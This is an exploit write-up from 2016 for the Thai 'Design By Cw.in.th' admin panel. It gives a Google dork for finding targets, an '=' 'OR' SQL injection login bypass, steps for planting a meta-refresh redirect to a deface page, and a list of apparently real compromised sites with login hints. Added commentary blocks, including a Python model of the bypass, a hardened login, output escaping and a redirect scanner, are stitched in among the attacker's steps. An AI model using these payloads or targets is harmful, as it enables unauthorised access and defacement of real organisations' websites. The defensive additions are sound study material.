- Design By Cw.in.th Admin Page Bypass Leading to XSS ATTACKS on Victim Website
- ###########################################
- ~Special thanks to Ashiyane Digital Security Team.
- ~Exploit Title : Design By Cw.in.th Admin Page Bypass Leading to XSS ATTACKS on Victim website
- ~Exploit Author: Lelouch Baklita
- ~Date : June 2 2016
- ~Tested on live sites: see section 4, Proof.
- # Vendor Homepage : http://cw.in.th/
- # Google Dork : intext:"Design By Cw.in.th"
- ~Contact:lordzero2222@gmail.com
- ~facebook.com/MagdaloCyberArmy/
- ~facebook.com/www.globalsec.hacks.ph/
- #########################################
- So I'll use their exploit as the reference for this one.
- You can see it here -> https://cxsecurity.com/issue/WLB-2016060006
- So now let's start.
- ######################
- # Exploit Title : Design By Cw.in.th Admin Page Bypass
- # Exploit Author : Ashiyane Digital Security Team
- # Vendor Homepage : http://cw.in.th/
- # Google Dork : intext:"Design By Cw.in.th"
- # Date: 2016 05 31
- # Tested On : Kali
- # Contact:n3t.hacker@gmail.com
- ######################
- # Description : Search the dork and select a target. Then append webpanel/index.php to the URL, such as:
- #
- # http://site.com/webpanel/index.php
- #
- # Enter username and password : '=' 'OR'
- #
- # Username (ชื่อเข้าใช้งาน) : '=' 'OR'
- # Password (รหัสผ่าน) : '=' 'OR'
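- Before the steps, an added example (not from this write-up, from Ashiyane, or from cw.in.th) of why the login bypass above works and what the fix looks like. It models the panel's login in Python with SQLite; the table names, the credentials and the query text are assumptions, since the panel's PHP is not public. The '=' 'OR' payload itself relies on MySQL's lax string-to-number comparison and does not fire on SQLite, so the block uses the equivalent ' OR '1'='1 form against the same concatenated query; the hardened login binds parameters and compares a salted PBKDF2 hash in constant time.

```python
import hashlib
import hmac
import secrets
import sqlite3

# Constructed model of a PHP-style admin login, not the vendor's code.
# The webpanel's real query is unknown; the advisory's bypass only makes
# sense if user input is pasted straight into the WHERE clause.

PBKDF2_ROUNDS = 100_000


def pbkdf2(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


def setup_db():
    con = sqlite3.connect(":memory:")
    # Plaintext storage goes hand in hand with a concatenated query.
    con.execute("CREATE TABLE admin (username TEXT, password TEXT)")
    con.execute("INSERT INTO admin VALUES ('admin', 'hunter2')")
    # Hardened variant: per-user salt and a slow hash instead of the password.
    con.execute("CREATE TABLE admin_hashed (username TEXT, salt BLOB, hash BLOB)")
    salt = secrets.token_bytes(16)
    con.execute("INSERT INTO admin_hashed VALUES (?, ?, ?)",
                ("admin", salt, pbkdf2("hunter2", salt)))
    return con


def vulnerable_login(con, username, password):
    # String interpolation: whatever the attacker types becomes SQL.
    sql = (f"SELECT username FROM admin "
           f"WHERE username='{username}' AND password='{password}'")
    return con.execute(sql).fetchone() is not None


def hardened_login(con, username, password):
    # Bound parameter: the input is data and never part of the statement.
    row = con.execute("SELECT salt, hash FROM admin_hashed WHERE username=?",
                      (username,)).fetchone()
    if row is None:
        # Burn the same work so a missing user is not detectable by timing.
        pbkdf2(password, b"\x00" * 16)
        return False
    salt, stored = row
    return hmac.compare_digest(pbkdf2(password, salt), stored)


# Classic tautology payload; the advisory's '=' 'OR' plays the same role on MySQL.
BYPASS = "' OR '1'='1"

if __name__ == "__main__":
    con = setup_db()
    print("vulnerable, real creds :", vulnerable_login(con, "admin", "hunter2"))
    print("vulnerable, bypass     :", vulnerable_login(con, BYPASS, BYPASS))
    print("hardened, real creds   :", hardened_login(con, "admin", "hunter2"))
    print("hardened, bypass       :", hardened_login(con, BYPASS, BYPASS))
```

- With the payload in both fields the vulnerable query becomes `WHERE username='' OR '1'='1' AND password='' OR '1'='1'`, which is true for every row, so the first admin row is returned and the session is granted without a password. The hardened version looks up the literal string as a username, finds nothing and fails.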
- So let's get the job started. (For the record, the '=' 'OR' login is a SQL injection: the panel pastes the username and password straight into its login query, and on MySQL the resulting comparison evaluates true for every row, so the first admin row is returned.)
- 0. I assume you have some sites by now, but I guarantee most of them have already been hit by someone else.
- 1. After logging in, look for any form boxes (fields whose content gets saved and shown on the public site). If you can't see any, search around the panel. The panel is in Thai, so use Google Translate if you can't understand what it says.
- 2. Paste the code below into a form box and save it:
- <meta http-equiv="refresh" content="1;URL=http://mammothcar.net/calebpogi.html"> <--- this is a meta refresh tag: anyone who loads the page is sent to that URL after one second. The write-up calls this XSS, but what it demonstrates is stored HTML injection (the field is rendered without output encoding); no script runs, the page simply redirects.
- 3. In this case http://mammothcar.net/calebpogi.html is my deface page, hosted on mammothcar.net; on your own run, change it to the link of your own deface page. You can try other methods as well.
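- An added example (not the write-up's code and not cw.in.th's) of what step 2's payload does once stored, together with the two things a practitioner wants next to it: the output encoding that neutralises it, and a scanner that lists where a page's meta-refresh tags send visitors, which is handy for checking the sites in the Proof list or cleaning up after a defacement. The template and the field name are assumptions; the payload is the one from step 2.

```python
import html
import re

# Constructed model of the panel's content field, not the vendor's template.
PAYLOAD = ('<meta http-equiv="refresh" '
           'content="1;URL=http://mammothcar.net/calebpogi.html">')


def render_unescaped(field_value):
    # What an injectable template does: raw input becomes markup.
    return f'<div class="news">{field_value}</div>'


def render_escaped(field_value):
    # html.escape turns < > & " ' into entities, so the browser shows the
    # text of the tag instead of acting on it.
    return f'<div class="news">{html.escape(field_value, quote=True)}</div>'


META_TAG = re.compile(r"<meta\b[^>]*>", re.IGNORECASE)
# name="double" | name='single' | name=bare, attribute order does not matter
ATTR = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
URL_PART = re.compile(r"""url\s*=\s*['"]?([^'"\s]+)""", re.IGNORECASE)


def find_meta_redirects(page):
    """Return the URLs that <meta http-equiv=refresh> tags in `page` send visitors to."""
    targets = []
    for tag in META_TAG.findall(page):
        attrs = {}
        for name, dq, sq, bare in ATTR.findall(tag):
            attrs[name.lower()] = dq or sq or bare
        if attrs.get("http-equiv", "").lower() != "refresh":
            continue
        match = URL_PART.search(attrs.get("content", ""))
        if match:
            targets.append(match.group(1))
    return targets


if __name__ == "__main__":
    for page in (render_unescaped(PAYLOAD), render_escaped(PAYLOAD)):
        print(page)
        print("  redirects to:", find_meta_redirects(page))
```

- The scanner only recognises meta-refresh redirects, which is the technique on this page; a JavaScript `location` change or a server-side 30x would need a different check. Run it over the saved HTML of each site rather than a live fetch, otherwise the redirect itself may carry you off to the deface page before you see the tag.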
- 4. Proof:
- http://premierlighting.co.th/webpanel/index.php <-- log in there with '=' 'OR' and it will redirect
- http://www.aurora-works.com/
- http://www.tokyogemlab.co.th/newsevents.php
- http://www.artiste-model.com/webpanel/ <-- log in there with '=' 'OR' and it will redirect
- http://www.hicoff.com/webpanel/ <-- log in there with '=' 'OR' and it will redirect
- Thanks for reading! Mabuhay!
- Update: Still waiting for the vendor to respond.